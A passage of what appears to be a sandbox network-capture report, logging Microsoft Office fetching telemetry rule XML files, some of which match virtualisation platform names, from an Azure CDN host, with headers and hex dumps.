                  2024-10-23 04:48:12 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  64192.168.2.44981213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:13 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:13 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:13 GMT
                  Content-Type: text/xml
                  Content-Length: 485
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                  ETag: "0x8DC582BB9769355"
                  x-ms-request-id: acb2ef9b-e01e-001f-1f33-221633000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044813Z-16849878b788tnsxzb2smucwdc00000005qg00000000ddkc
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:13 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  65192.168.2.44981413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:13 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:13 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:13 GMT
                  Content-Type: text/xml
                  Content-Length: 470
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                  ETag: "0x8DC582BBB181F65"
                  x-ms-request-id: 3e1aae04-d01e-00a1-06f2-2435b1000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044813Z-15b8d89586fmhkw4gksnr1w3ds0000000ca0000000004286
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:13 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  66192.168.2.44981513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:13 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:13 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:13 GMT
                  Content-Type: text/xml
                  Content-Length: 427
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                  ETag: "0x8DC582BB556A907"
                  x-ms-request-id: d4a93cd8-001e-008d-65f5-24d91e000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044813Z-15b8d89586flspj6y6m5fk442w00000002q000000000fsyy
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:13 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                  Session IDSource IPSource PortDestination IPDestination Port
                  67192.168.2.44981313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:13 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:13 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:13 GMT
                  Content-Type: text/xml
                  Content-Length: 411
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                  ETag: "0x8DC582B989AF051"
                  x-ms-request-id: 7cfbc72c-d01e-0082-6d55-22e489000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044813Z-16849878b78ngdnlw4w0762cms00000005t000000000d2b3
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:13 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                  Session IDSource IPSource PortDestination IPDestination Port
                  68192.168.2.44981613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:13 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:13 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:13 GMT
                  Content-Type: text/xml
                  Content-Length: 502
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                  ETag: "0x8DC582BB6A0D312"
                  x-ms-request-id: fc13fe58-401e-000a-0af3-244a7b000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044813Z-15b8d89586fzhrwg5nzgg1z6000000000ccg000000000sxy
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:13 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  69192.168.2.44981713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:13 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:14 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:13 GMT
                  Content-Type: text/xml
                  Content-Length: 407
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                  ETag: "0x8DC582B9D30478D"
                  x-ms-request-id: b1315031-501e-000a-22f5-240180000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044813Z-r197bdfb6b4rkc6mucm45nkzmn00000003zg000000000v5r
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:14 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                  Session IDSource IPSource PortDestination IPDestination Port
                  70192.168.2.44981913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:13 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:14 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:13 GMT
                  Content-Type: text/xml
                  Content-Length: 408
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                  ETag: "0x8DC582BB9B6040B"
                  x-ms-request-id: c0884099-101e-0046-3a40-2291b0000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044813Z-16849878b78c5zx4gw8tcga1b400000005p0000000006mtp
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:14 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                  Session IDSource IPSource PortDestination IPDestination Port
                  71192.168.2.44981813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:13 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:14 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:13 GMT
                  Content-Type: text/xml
                  Content-Length: 474
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                  ETag: "0x8DC582BB3F48DAE"
                  x-ms-request-id: 8b572347-501e-008c-80f2-21cd39000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044813Z-16849878b78q4pnrt955f8nkx800000005hg00000000fnte
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:14 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  72192.168.2.44982013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:13 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:14 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:13 GMT
                  Content-Type: text/xml
                  Content-Length: 469
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                  ETag: "0x8DC582BB3CAEBB8"
                  x-ms-request-id: ac69ef67-e01e-001f-7714-221633000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044813Z-16849878b78jfqwd1dsrhqg3aw00000005x00000000018ve
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:14 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  73192.168.2.44982113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:14 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:14 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:14 GMT
                  Content-Type: text/xml
                  Content-Length: 416
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                  ETag: "0x8DC582BB5284CCE"
                  x-ms-request-id: 907020bf-b01e-00ab-33f4-24dafd000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044814Z-15b8d89586fxdh48qknu9dqk2g0000000130000000002hp1
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:14 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                  Session IDSource IPSource PortDestination IPDestination Port
                  74192.168.2.44982413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:14 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:14 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:14 GMT
                  Content-Type: text/xml
                  Content-Length: 475
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                  ETag: "0x8DC582BBA740822"
                  x-ms-request-id: 931f542e-301e-000c-75f2-21323f000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044814Z-16849878b78bkvbz1ry47zvsas00000005rg00000000ad3q
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:14 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
